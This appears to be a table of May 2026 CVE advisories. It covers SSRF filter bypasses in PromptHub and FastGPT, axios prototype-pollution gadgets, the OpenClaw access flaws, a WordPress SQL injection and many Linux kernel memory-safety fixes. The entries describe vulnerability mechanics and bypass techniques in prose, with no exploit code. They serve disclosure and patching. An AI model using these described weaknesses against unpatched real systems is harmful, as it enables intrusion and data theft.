| legeling--PromptHub | PromptHub is an all-in-one AI toolbox for prompt, skill, and agent management. From version 0.4.9 to before version 0.5.4, apps/web/src/routes/skills.ts exposes an authenticated endpoint POST /api/skills/fetch-remote that fetches a user-supplied URL server-side and reflects the response body (up to 5 MB) back to the caller. The SSRF protection in apps/web/src/utils/remote-http.ts (isPrivateIPv6) attempts to block private/loopback destinations, but multiple alternate-but-valid IPv6 representations bypass the check. The bypasses reach any IPv4 address (loopback, RFC1918, link-local) via IPv4-mapped IPv6 in hex form, and the canonical ::1 via any representation that isn't the literal string "::1". Any authenticated user (role: user or admin) can trigger the SSRF. On deployments configured with ALLOW_REGISTRATION=true - a supported and documented configuration - this means any internet user who can register. This issue has been patched in version 0.5.4. | 2026-05-08 | 7.1 | CVE-2026-42261 | https://github.com/legeling/PromptHub/security/advisories/GHSA-9fhh-fjfg-5mr6 https://github.com/legeling/PromptHub/releases/tag/v0.5.4 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. From version 1.0.0 to before version 1.15.2, five config properties (auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser) in the HTTP adapter are read via direct property access without hasOwnProperty guards, making them exploitable as prototype pollution gadgets. When Object.prototype is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request. This issue has been patched in version 1.15.2. | 2026-05-08 | 7.4 | CVE-2026-42264 | https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj https://github.com/axios/axios/pull/10779 https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa https://github.com/axios/axios/releases/tag/v1.15.2 |
| osrg--gobgp | GoBGP is an open source Border Gateway Protocol (BGP) implementation in the Go Programming Language. In version 4.4.0, an unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a "withdraw" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability. This issue has been patched in version 4.5.0. | 2026-05-07 | 7.5 | CVE-2026-42285 | https://github.com/osrg/gobgp/security/advisories/GHSA-p3w2-64xm-833j https://github.com/osrg/gobgp/releases/tag/v4.5.0 |
| befeleme--pyp2spec | pyp2spec generates working Fedora RPM spec files for Python projects. Prior to version 0.14.1, pyp2spec was writing PyPI package metadata (e.g. the summary field) into the generated spec file without escaping RPM macro directives. When a packager then runs rpmbuild, those directives get evaluated, so a malicious package can execute arbitrary commands on the build machine. This issue has been patched in version 0.14.1. | 2026-05-09 | 7.8 | CVE-2026-42301 | https://github.com/befeleme/pyp2spec/security/advisories/GHSA-r35x-v8p8-xvhw https://github.com/befeleme/pyp2spec/releases/tag/v0.14.1 |
| labring--FastGPT | FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packages/service/common/system/utils.ts blocks cloud metadata endpoints using a fullUrl.startsWith() check against a hardcoded list. This check can be bypassed using at least 7 different URL encoding techniques, all of which resolve to the same cloud metadata service but do not match the blocklist patterns. Additionally, the broader private IP check (isInternalIPv4/isInternalIPv6) is disabled by default because CHECK_INTERNAL_IP defaults to false (not 'true'), so these bypasses reach the metadata endpoint without any further validation. At time of publication, there are no publicly available patches. | 2026-05-08 | 7.7 | CVE-2026-42345 | https://github.com/labring/FastGPT/security/advisories/GHSA-jhqw-944x-xh94 |
| geopython--pygeoapi | pygeoapi is a Python server implementation of the OGC API suite of standards. From version 0.23.0 to before version 0.23.3, a raw string path concatenation vulnerability in pygeoapi's STAC FileSystemProvider plugin can allow for requests to STAC collection based collections to expose directories without authentication. The issue manifests when pygeoapi is deployed without a proxy or web front end that would normalize URLs with .. values, along with a resource of type stac-collection defined in configuration. This issue has been patched in version 0.23.3. | 2026-05-08 | 7.5 | CVE-2026-42351 | https://github.com/geopython/pygeoapi/security/advisories/GHSA-f6pr-83pg-ghh6 https://github.com/geopython/pygeoapi/commit/bf25b8695edbdd5476eeffc102b633d1d3e45f52 https://github.com/geopython/pygeoapi/releases/tag/0.23.3 |
| GeoVision Inc.--GV-LPC2011/LPC2211 | Multiple reflected cross-site scripting (XSS) vulnerabilities exist in the Web Interface / ssi.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted malicious URL can lead to arbitrary JavaScript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-05-04 | 7.4 | CVE-2026-42366 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.14 contains an improper access control vulnerability in browser snapshot, screenshot, and tab routes that fail to consistently validate the final browser target after navigation. Authenticated callers can bypass SSRF restrictions to expose internal or disallowed page content by exploiting route-driven navigation without proper policy re-validation. | 2026-05-05 | 7.7 | CVE-2026-42436 | GitHub Security Advisory (GHSA-c4qm-58hj-j6pj) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.14 - Internal Page Content Exposure via Browser Snapshot and Screenshot Routes |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.9 before 2026.4.10 contain a denial of service vulnerability in the voice-call realtime WebSocket path that accepts oversized frames without proper validation. Remote attackers can send oversized WebSocket frames to cause service unavailability for deployments exposing the webhook path. | 2026-05-05 | 7.5 | CVE-2026-42437 | GitHub Security Advisory (GHSA-vw3h-q6xq-jjm5) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.9 < 2026.4.10 - Denial of Service via Oversized WebSocket Frames in Voice-call Realtime Path |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.9 before 2026.4.10 contain a sender policy bypass vulnerability in the outbound host-media attachment read helper that allows unauthorized local file disclosure. Attackers with denied read access via toolsBySender or group policy can trigger host-media attachment loading to bypass sender and group-scoped authorization boundaries and retrieve readable local files through the outbound media path. | 2026-05-05 | 7.7 | CVE-2026-42438 | GitHub Security Advisory (GHSA-jhpv-5j76-m56h) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.9 < 2026.4.10 - Sender Policy Bypass in Host Media Attachment Reads |
| chainguard-dev--apko | apko allows users to build and publish OCI container images built from apk packages. From version 0.14.8 to before version 1.2.5, a crafted .apk could install a TypeSymlink tar entry whose target pointed outside the build root, and a subsequent directory-creation or file-write entry in the same or later archive could traverse that symlink to reach host paths the build user could write to. This issue has been patched in version 1.2.5. | 2026-05-09 | 7.5 | CVE-2026-42574 | https://github.com/chainguard-dev/apko/security/advisories/GHSA-qq3r-w4hj-gjp6 https://github.com/chainguard-dev/apko/pull/2187 https://github.com/chainguard-dev/apko/commit/f5a96e1299ac81c7ea9441705ec467688086f442 https://github.com/chainguard-dev/apko/releases/tag/v1.2.5 |
| chainguard-dev--apko | apko allows users to build and publish OCI container images built from apk packages. Prior to version 1.2.7, apko verifies the signature on APKINDEX.tar.gz but never compares individually downloaded .apk packages against the checksum recorded in the signed index. The checksum is parsed and available via ChecksumString(), and the downloaded package control hash is computed, but the two values are never compared in getPackageImpl(). Mismatched packages are silently accepted. An attacker who can substitute download responses (compromised mirror, HTTP repository, poisoned CDN cache) can install arbitrary packages into built images. This issue has been patched in version 1.2.7. | 2026-05-09 | 7.5 | CVE-2026-42575 | https://github.com/chainguard-dev/apko/security/advisories/GHSA-hcwr-pq9g-rq3m https://github.com/chainguard-dev/apko/commit/a118c3d604107532b5525bd4bee2fb369a6228aa https://github.com/chainguard-dev/apko/releases/tag/v1.2.7 |
| OpenStack--Ironic | An issue was discovered in idrac in OpenStack Ironic before 35.0.1. During import, a user invoking molds can request authorization to be sent to a remote endpoint. The credential forwarded is a time-limited Keystone token (which provides access to all OpenStack services Ironic is authorized for); or basic credentials configured for molds storage. The fixed versions are 26.1.6, 29.0.5, 32.0.1, and 35.0.1. | 2026-05-05 | 7.7 | CVE-2026-42997 | https://www.openwall.com/lists/oss-security/2026/05/05/10 https://security.openstack.org/ossa/OSSA-2026-010.html |
| WeePie--WeePie Cookie Allow | The WeePie Cookie Allow plugin for WordPress is vulnerable to SQL Injection via the 'consent' parameter in all versions up to, and including, 3.4.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-05 | 7.5 | CVE-2026-4304 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f783e626-37c0-4ad9-9074-c5332583a0cb?source=cve https://codecanyon.net/item/weepie-cookie-allow-easy-complete-cookie-consent-plugin/10342528 https://weepie-plugins.com/changelog-weepie-cookie-allow-plugin/ |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_ct: drop pending enqueued packets on removal Packets sitting in nfqueue might hold a reference to: - templates that specify the conntrack zone, because a percpu area is used and module removal is possible. - conntrack timeout policies and helper, where object removal leaves a stale reference. Since these objects can just go away, drop enqueued packets to avoid stale references to them. If there is a need for finer grain removal, this logic can be revisited to make selective packet drop upon dependencies. | 2026-05-05 | 7.8 | CVE-2026-43060 | https://git.kernel.org/stable/c/8a64e76933672b08bd85b63086f33432070fd729 https://git.kernel.org/stable/c/3da0b946835f33bf36b459ead764c61a761e689b https://git.kernel.org/stable/c/ab50302190b303f847c4eba0e31a01a56dec596e https://git.kernel.org/stable/c/e68a8db3a0546482b34e9ca5ca886bcf73eb37bb https://git.kernel.org/stable/c/6802ff8beceb9c4254318e81c1395720438f2cc2 https://git.kernel.org/stable/c/f29a055e4f593e577805b41228b142b58f48df1b https://git.kernel.org/stable/c/77da55dee67720e2b8d2db49a53334e6c017ee7b https://git.kernel.org/stable/c/36eae0956f659e48d5366d9b083d9417f3263ddc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix type confusion in l2cap_ecred_reconf_rsp() l2cap_ecred_reconf_rsp() casts the incoming data to struct l2cap_ecred_conn_rsp (the ECRED *connection* response, 8 bytes with result at offset 6) instead of struct l2cap_ecred_reconf_rsp (2 bytes with result at offset 0). This causes two problems: - The sizeof(*rsp) length check requires 8 bytes instead of the correct 2, so valid L2CAP_ECRED_RECONF_RSP packets are rejected with -EPROTO. - rsp->result reads from offset 6 instead of offset 0, returning wrong data when the packet is large enough to pass the check. Fix by using the correct type. Also pass the already byte-swapped result variable to BT_DBG instead of the raw __le16 field. | 2026-05-05 | 7.1 | CVE-2026-43062 | https://git.kernel.org/stable/c/21d3ba696918d6373233aac0b9d51fcabdedddc0 https://git.kernel.org/stable/c/3b94e62caa1dc1198d0d55d97bd710da1dee15d7 https://git.kernel.org/stable/c/111f74547eee8cfedfb854284e80f35c8a491186 https://git.kernel.org/stable/c/dd3b221e21079ade8263fbb7176f3d55ad75d3b6 https://git.kernel.org/stable/c/d90150c72d2e6a8a3079e88755dafcfbe91c746d https://git.kernel.org/stable/c/5a1ea296f8589ce8f1e3141b2b123b34ad010e19 https://git.kernel.org/stable/c/f110b8f58b254bf997cec1bd60701b7798e9bb82 https://git.kernel.org/stable/c/15145675690cab2de1056e7ed68e59cbd0452529 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: don't irele after failing to iget in xfs_attri_recover_work xlog_recovery_iget* never set @ip to a valid pointer if they return an error, so this irele will walk off a dangling pointer. Fix that. | 2026-05-05 | 7.8 | CVE-2026-43063 | https://git.kernel.org/stable/c/b5c5a50c2f513d4a13a6763564a07b470e69cc5a https://git.kernel.org/stable/c/a1a5df1038f0b3c560d204270373621a4e622808 https://git.kernel.org/stable/c/40082d08b638485cbaa543dc8087a3d1844d6f08 https://git.kernel.org/stable/c/70685c291ef82269180758130394ecdc4496b52c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Reset register ID for BPF_END value tracking When a register undergoes a BPF_END (byte swap) operation, its scalar value is mutated in-place. If this register previously shared a scalar ID with another register (e.g., after an `r1 = r0` assignment), this tie must be broken. Currently, the verifier misses resetting `dst_reg->id` to 0 for BPF_END. Consequently, if a conditional jump checks the swapped register, the verifier incorrectly propagates the learned bounds to the linked register, leading to false confidence in the linked register's value and potentially allowing out-of-bounds memory accesses. Fix this by explicitly resetting `dst_reg->id` to 0 in the BPF_END case to break the scalar tie, similar to how BPF_NEG handles it via `__mark_reg_known`. | 2026-05-05 | 7.8 | CVE-2026-43070 | https://git.kernel.org/stable/c/a17443af874229408ce6b78e2c8a2b5adeb4b7d8 https://git.kernel.org/stable/c/0d15c3611a2cc5d08993545d4032055ae10ae2c1 https://git.kernel.org/stable/c/a3125bc01884431d30d731461634c8295b6f0529 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: eventpoll: defer struct eventpoll free to RCU grace period In certain situations, ep_free() in eventpoll.c will kfree the epi->ep eventpoll struct while it is still being used by another concurrent thread. Defer the kfree() to an RCU callback to prevent UAF. | 2026-05-06 | 7.8 | CVE-2026-43074 | https://git.kernel.org/stable/c/a6566cd33f6f967a7651ebf2ce0dd31572e319cf https://git.kernel.org/stable/c/5b1173b165421561db29f30afc7e97d940a398a9 https://git.kernel.org/stable/c/7e8083f5eeedab0f460063b9c2c14c9a4e71a427 https://git.kernel.org/stable/c/ae0bb9c1fb7c2594519aeeb096cf2c3b7837b322 https://git.kernel.org/stable/c/07712db80857d5d09ae08f3df85a708ecfc3b61f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix out-of-bounds write in ocfs2_write_end_inline KASAN reports a use-after-free write of 4086 bytes in ocfs2_write_end_inline, called from ocfs2_write_end_nolock during a copy_file_range splice fallback on a corrupted ocfs2 filesystem mounted on a loop device. The actual bug is an out-of-bounds write past the inode block buffer, not a true use-after-free. The write overflows into an adjacent freed page, which KASAN reports as UAF. The root cause is that ocfs2_try_to_write_inline_data trusts the on-disk id_count field to determine whether a write fits in inline data. On a corrupted filesystem, id_count can exceed the physical maximum inline data capacity, causing writes to overflow the inode block buffer. Call trace (crash path): vfs_copy_file_range (fs/read_write.c:1634) do_splice_direct splice_direct_to_actor iter_file_splice_write ocfs2_file_write_iter generic_perform_write ocfs2_write_end ocfs2_write_end_nolock (fs/ocfs2/aops.c:1949) ocfs2_write_end_inline (fs/ocfs2/aops.c:1915) memcpy_from_folio <-- KASAN: write OOB So add an id_count upper bound check in ocfs2_validate_inode_block() alongside the existing i_size check to fix it. | 2026-05-06 | 7.8 | CVE-2026-43075 | https://git.kernel.org/stable/c/e2c9dc6b6e96f3585f2a1062ca3374a52db0938f https://git.kernel.org/stable/c/947f953978b0d9463498d548d0f054f5a75be2e9 https://git.kernel.org/stable/c/0c1af902223b6fcedb60904ca0b551254686c7b9 https://git.kernel.org/stable/c/69d3c69ade1e4285ab4ca48fe7acee0767e65604 https://git.kernel.org/stable/c/7bc5da4842bed3252d26e742213741a4d0ac1b14 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: validate inline data i_size during inode read When reading an inode from disk, ocfs2_validate_inode_block() performs various sanity checks but does not validate the size of inline data. If the filesystem is corrupted, an inode's i_size can exceed the actual inline data capacity (id_count). This causes ocfs2_dir_foreach_blk_id() to iterate beyond the inline data buffer, triggering a use-after-free when accessing directory entries from freed memory. In the syzbot report: - i_size was 1099511627576 bytes (~1TB) - Actual inline data capacity (id_count) is typically <256 bytes - A garbage rec_len (54648) caused ctx->pos to jump out of bounds - This triggered a UAF in ocfs2_check_dir_entry() Fix by adding a validation check in ocfs2_validate_inode_block() to ensure inodes with inline data have i_size <= id_count. This catches the corruption early during inode read and prevents all downstream code from operating on invalid data. | 2026-05-06 | 7.8 | CVE-2026-43076 | https://git.kernel.org/stable/c/37f074e65f24f10f8d8df224a572e4cb9e6faf63 https://git.kernel.org/stable/c/c1de19e891be3bfb3e1d0c7cf07bbb8fb3b77c1b https://git.kernel.org/stable/c/cd2d765aa7157f852999842af32148128c735d39 https://git.kernel.org/stable/c/77d0295725109d77f5854ef5b58c0d06c08168cc https://git.kernel.org/stable/c/1524af3685b35feac76662cc551cbc37bd14775f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl When page reassignment was added to af_alg_pull_tsgl the original loop wasn't updated so it may try to reassign one more page than necessary. Add the check to the reassignment so that this does not happen. Also update the comment which still refers to the obsolete offset argument. | 2026-05-06 | 7.8 | CVE-2026-43078 | https://git.kernel.org/stable/c/fa48d3ea9cdbfb28c1fd6756c6c5cd01351aa51e https://git.kernel.org/stable/c/2b781d1d4f933990318bcc5c68fb75a717379e42 https://git.kernel.org/stable/c/f7826bc0b39928a4a22f6b815dd9940b22a63503 https://git.kernel.org/stable/c/710a4ce5d7afd9fe082c75dec282ab4a11c0fe71 https://git.kernel.org/stable/c/c8369a6d62f5abde9cbd4b62c45bf4b996be2468 https://git.kernel.org/stable/c/dea5fcf085f977b6c2de1b2d4ec4767b6c840d1f https://git.kernel.org/stable/c/9532501e0f1b200ea80baa0e33e0b06da10bb271 https://git.kernel.org/stable/c/31d00156e50ecad37f2cb6cbf04aaa9a260505ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_queue: make hash table per queue Sharing a global hash table among all queues is tempting, but it can cause a crash: BUG: KASAN: slab-use-after-free in nfqnl_recv_verdict+0x11ac/0x15e0 [nfnetlink_queue] [..] nfqnl_recv_verdict+0x11ac/0x15e0 [nfnetlink_queue] nfnetlink_rcv_msg+0x46a/0x930 kmem_cache_alloc_node_noprof+0x11e/0x450 struct nf_queue_entry is freed via kfree, but a parallel CPU can still encounter such an nf_queue_entry when walking the list. An alternative fix is to free the nf_queue_entry via kfree_rcu() instead, but as we have to alloc/free for each skb this will cause more memory pressure. | 2026-05-06 | 7.8 | CVE-2026-43084 | https://git.kernel.org/stable/c/22730cb96093b5be0609063bbb1923dbecd61252 https://git.kernel.org/stable/c/41e3652a178cb0eecd48e0e6e27fbb73a004046a https://git.kernel.org/stable/c/9e5ebef91120d2764aefe557c3a484b6288f341f https://git.kernel.org/stable/c/936206e3f6ff411581e615e930263d6f8b78df9d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: Wait for RCU readers during policy netns exit xfrm_policy_fini() frees the policy_bydst hash tables after flushing the policy work items and deleting all policies, but it does not wait for concurrent RCU readers to leave their read-side critical sections first. The policy_bydst tables are published via rcu_assign_pointer() and are looked up through rcu_dereference_check(), so netns teardown must also wait for an RCU grace period before freeing the table memory. Fix this by adding synchronize_rcu() before freeing the policy hash tables. | 2026-05-06 | 7.8 | CVE-2026-43091 | https://git.kernel.org/stable/c/b66920a3348c0f63ba18365248fa21fbf0b3a937 https://git.kernel.org/stable/c/438b1f668ad58f46ce699bb48e4698a7839e3f9e https://git.kernel.org/stable/c/3733fce2871c9bca9dd18a1a23b1432ea215a094 https://git.kernel.org/stable/c/33a3149dd81a1e2f52b80ee1e0fc380b39f3d028 https://git.kernel.org/stable/c/069daad4f2ae9c5c108131995529d5f02392c446 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xsk: tighten UMEM headroom validation to account for tailroom and min frame The current headroom validation in xdp_umem_reg() could leave us with insufficient space to receive even a minimum-sized Ethernet frame. Furthermore, if multi-buffer came into play, the skb_shared_info stored at the end of the XSK frame would be corrupted. HW typically works with 128-aligned sizes, so let us provide this value as the bare minimum. The multi-buffer setting is known later in the configuration process, so besides accounting for 128 bytes, let us also take care of tailroom space upfront. | 2026-05-06 | 7.8 | CVE-2026-43093 | https://git.kernel.org/stable/c/a03975beb9f6af0d8ac051e30b2abeabe618414f https://git.kernel.org/stable/c/0ec4d3f6e6934deb843b561ae048cd17218e5ad1 https://git.kernel.org/stable/c/9ea6ba4f3195dcba6e8b3e7b2e748593b7cafb12 https://git.kernel.org/stable/c/6523bc1b40e69301f24c14338b762af4739d6d39 https://git.kernel.org/stable/c/a315e022a72d95ef5f1d4e58e903cb492b0ad931 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv4: icmp: fix null-ptr-deref in icmp_build_probe() ipv6_stub->ipv6_dev_find() may return ERR_PTR(-EAFNOSUPPORT) when the IPv6 stack is not active (CONFIG_IPV6=m and not loaded), and passing this error pointer to dev_hold() will cause a kernel crash with null-ptr-deref. Instead, silently discard the request. RFC 8335 does not appear to define a specific response for the case where an IPv6 interface identifier is syntactically valid but the implementation cannot perform the lookup at runtime, and silently dropping the request may be safer than misreporting "No Such Interface". | 2026-05-06 | 7.5 | CVE-2026-43099 | https://git.kernel.org/stable/c/47a8bf52156ac7e7a581eca31c1f964ba4258d4d https://git.kernel.org/stable/c/6be325206850a0891896d38bcf83a09d8b54ec48 https://git.kernel.org/stable/c/f91b3ed9e7fa82a70511b5f6901c88379acf2964 https://git.kernel.org/stable/c/5b9911582d441f72fe6ccb15ffe3303bbc07f6f5 https://git.kernel.org/stable/c/fde29fd9349327acc50d19a0b5f3d5a6c964dfd8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: ioam: fix potential NULL dereferences in __ioam6_fill_trace_data() We need to check __in6_dev_get() for possible NULL value, as suggested by Yiming Qian. Also add skb_dst_dev_rcu() instead of skb_dst_dev(), and two missing READ_ONCE(). Note that @dev can't be NULL. | 2026-05-06 | 7.5 | CVE-2026-43101 | https://git.kernel.org/stable/c/4198aab6f000b4febb18ea820fea20634dd789c7 https://git.kernel.org/stable/c/3719c234fa94c37c955b1ecd3742ef280ec135e6 https://git.kernel.org/stable/c/4e65a8b8daa18d63255ec58964dd192c7fdd9f8b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cachefiles: fix incorrect dentry refcount in cachefiles_cull() The patch mentioned below changed cachefiles_bury_object() to expect 2 references to the 'rep' dentry. Three of the callers were changed to use start_removing_dentry() which takes an extra reference so in those cases the call gets the expected references. However there is another call to cachefiles_bury_object() in cachefiles_cull() which did not need to be changed to use start_removing_dentry() and so was not properly considered. It still passed the dentry with just one reference so the net result is that a reference is lost. To meet the expectations of cachefiles_bury_object(), cachefiles_cull() must take an extra reference before the call. It will be dropped by cachefiles_bury_object(). | 2026-05-06 | 7.8 | CVE-2026-43106 | https://git.kernel.org/stable/c/6577df7dc7a7de128442b6192c7a32195c923480 https://git.kernel.org/stable/c/1635c2acdde86c4f555b627aec873c8677c421ed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: roccat: fix use-after-free in roccat_report_event roccat_report_event() iterates over the device->readers list without holding the readers_lock. This allows a concurrent roccat_release() to remove and free a reader while it's still being accessed, leading to a use-after-free. Protect the readers list traversal with the readers_lock mutex. | 2026-05-06 | 7.8 | CVE-2026-43111 | https://git.kernel.org/stable/c/e6a445513fbc6a0329d2d5ff375b6725750ec5a6 https://git.kernel.org/stable/c/e16a6d11bd77b81632165f02cf0d5946df74b3b7 https://git.kernel.org/stable/c/36bb2d0b915014bbdc5044982b31b57b78045b93 https://git.kernel.org/stable/c/bca0b595e15450dd66b1153c76c4ef1087ee011b https://git.kernel.org/stable/c/d802d848308b35220f21a8025352f0c0aba15c12 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: ensure safe access to master conntrack Holding a reference on the expectation is not sufficient, the master conntrack object can just go away, making exp->master invalid. To access exp->master safely: - Grab the nf_conntrack_expect_lock, this gets serialized with clean_from_lists() which also holds this lock when the master conntrack goes away. - Hold a reference on the master conntrack via nf_conntrack_find_get(). Not so easy since the master tuple to look up for the master conntrack is not available in the existing problematic paths. This patch goes for extending the nf_conntrack_expect_lock section to address this issue for simplicity; in the cases that are described below this is just slightly extending the lock section. The add expectation command already holds a reference to the master conntrack from ctnetlink_create_expect(). However, the delete expectation command needs to grab the spinlock before looking up the expectation. Expand the existing spinlock section to cover the expectation lookup. Note that the nf_ct_expect_iterate_net() calls already grab the spinlock while iterating over the expectation table, which is correct. The get expectation command needs to grab the spinlock to ensure the master conntrack does not go away. This also expands the existing spinlock section to cover the expectation lookup too. I needed to move the netlink skb allocation out of the spinlock to keep it GFP_KERNEL. For the expectation events, the IPEXP_DESTROY event is already delivered under the spinlock, just move the delivery of IPEXP_NEW under the spinlock too because the master conntrack event cache is reached through exp->master. While at it, add lockdep notations to help identify what codepaths need to grab the spinlock. | 2026-05-06 | 7.8 | CVE-2026-43116 | https://git.kernel.org/stable/c/f338ced0473849c9f6ed0b77ca99f1aab5826787 https://git.kernel.org/stable/c/497f99b26fffdc5635706d1b4811f1ed8ee21a5b https://git.kernel.org/stable/c/bffcaad9afdfe45d7fc777397d3b83c1e3ebffe5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix double free related to rereg_user_mr If IB_MR_REREG_TRANS is set during rereg_user_mr, the umem will be released and a new one will be allocated in irdma_rereg_mr_trans. If any step of irdma_rereg_mr_trans fails after the new umem is allocated, it releases the umem, but does not set iwmr->region to NULL. The problem is that this failure is propagated to the user, who will then call ibv_dereg_mr (as they should). Then, the dereg_mr path will see a non-NULL umem and attempt to call ib_umem_release again. Fix this by setting iwmr->region to NULL after ib_umem_release. Fixed: 5ac388db27c4 ("RDMA/irdma: Add support to re-register a memory region") | 2026-05-06 | 7.8 | CVE-2026-43120 | https://git.kernel.org/stable/c/62298a48f8b8788ad8b8464e6ffdf1ddebd2217e https://git.kernel.org/stable/c/66964118f1f50ed85001c8fc9f7ab5bbdd021ee0 https://git.kernel.org/stable/c/0f22c32141acdcda266b26cab2b830baf870f3e0 https://git.kernel.org/stable/c/0c5d70bcb9d2275a1c8515a924016fcfeb4ab441 https://git.kernel.org/stable/c/29a3edd7004bb635d299fb9bc6f0ea4ef13ed5a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: mixer: oss: Add card disconnect checkpoints The ALSA OSS mixer layer calls the kcontrol ops rather individually, and pending calls might not always be caught when disconnecting the device. To avoid the potential UAF scenarios, add sanity checks of the card disconnection at each entry point of OSS mixer accesses. The rwsem is taken just before that check, hence the rest of the context should be covered by that properly. | 2026-05-06 | 7.8 | CVE-2026-43126 | https://git.kernel.org/stable/c/ae583f113d15fa97e5234133c20d09f8e6214e47 https://git.kernel.org/stable/c/e6645e625480cdf1079a4265f758d13b70721029 https://git.kernel.org/stable/c/8c097cf736993454acf3f711a3b376d6c7ad8965 https://git.kernel.org/stable/c/084d5d44418148662365eced3e126ad1a81ee3e2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/umem: Fix double dma_buf_unpin in failure path In ib_umem_dmabuf_get_pinned_with_dma_device(), the call to ib_umem_dmabuf_map_pages() can fail. If this occurs, the dmabuf is immediately unpinned but the umem_dmabuf->pinned flag is still set. Then, when ib_umem_release() is called, it calls ib_umem_dmabuf_revoke() which will call dma_buf_unpin() again. Fix this by removing the immediate unpin upon failure and just let the ib_umem_release/revoke path handle it. This also ensures the proper unmap-unpin unwind ordering if the dmabuf_map_pages call happened to fail due to dma_resv_wait_timeout (and therefore has a non-NULL umem_dmabuf->sgt). | 2026-05-06 | 7.8 | CVE-2026-43128 | https://git.kernel.org/stable/c/70542b69abff34d24b11ae0bb200cc7a766d18df https://git.kernel.org/stable/c/b324327ff6f48d8065dca67eb3b91357e72726bd https://git.kernel.org/stable/c/ba3bf0f1bf1d5d0404678485e872980532fcc2c4 https://git.kernel.org/stable/c/d3e32e2f3262f1b25d77c085ace38e2cc4ad75cf https://git.kernel.org/stable/c/40126bcbefa79ea86672e05dae608596bab38319 https://git.kernel.org/stable/c/104016eb671e19709721c1b0048dd912dc2e96be |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Always use vmcb01 in VMLOAD/VMSAVE emulation Commit cc3ed80ae69f ("KVM: nSVM: always use vmcb01 to for vmsave/vmload of guest state") made KVM always use vmcb01 for the fields controlled by VMSAVE/VMLOAD, but it missed updating the VMLOAD/VMSAVE emulation code to always use vmcb01. As a result, if VMSAVE/VMLOAD is executed by an L2 guest and is not intercepted by L1, KVM will mistakenly use vmcb02. Always use vmcb01 instead of the current VMCB. | 2026-05-06 | 7.9 | CVE-2026-43133 | https://git.kernel.org/stable/c/10063e1251c1485034a018236080792ad083dcc5 https://git.kernel.org/stable/c/c3b7015000988ba35ecd5648f4b2283960f00543 https://git.kernel.org/stable/c/3880e331b0b31d0d5d3702b124f6c93539cd478a https://git.kernel.org/stable/c/fce2fd4a2ca05670a91015aacccf96a1c26268fd https://git.kernel.org/stable/c/d464cf1ed900d47c85393d40b00017b6adfc2e6c https://git.kernel.org/stable/c/0004ecb798b30e90d7ebfe74efae2d9423315a64 https://git.kernel.org/stable/c/127ccae2c185f62e6ecb4bf24f9cb307e9b9c619 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/arm-cmn: Reject unsupported hardware configurations So far we've been fairly lax about accepting both unknown CMN models (at least with a warning), and unknown revisions of those which we do know, as although things do frequently change between releases, typically enough remains the same to be somewhat useful for at least some basic bringup checks. However, we also make assumptions of the maximum supported sizes and numbers of things in various places, and there's no guarantee that something new might not be bigger and lead to nasty array overflows. Make sure we only try to run on things that actually match our assumptions and so will not risk memory corruption. We have at least always failed on completely unknown node types, so update that error message for clarity and consistency too. | 2026-05-06 | 7.8 | CVE-2026-43150 | https://git.kernel.org/stable/c/7e2c200010aa93fa78201da959b4ac6b9f8fed0b https://git.kernel.org/stable/c/d3e837e11ee9ed08df229272319199003ba00379 https://git.kernel.org/stable/c/00d69f21ef2ab00e6156c764d89e2b3539eb2f33 https://git.kernel.org/stable/c/08c7eadd8a934a1968e1aeeee8b61b853b99fb3a https://git.kernel.org/stable/c/a251d866f50b6a4c95901fa722025065679c2eca https://git.kernel.org/stable/c/36c0de02575ce59dfd879eb4ef63d53a68bbf9ce |
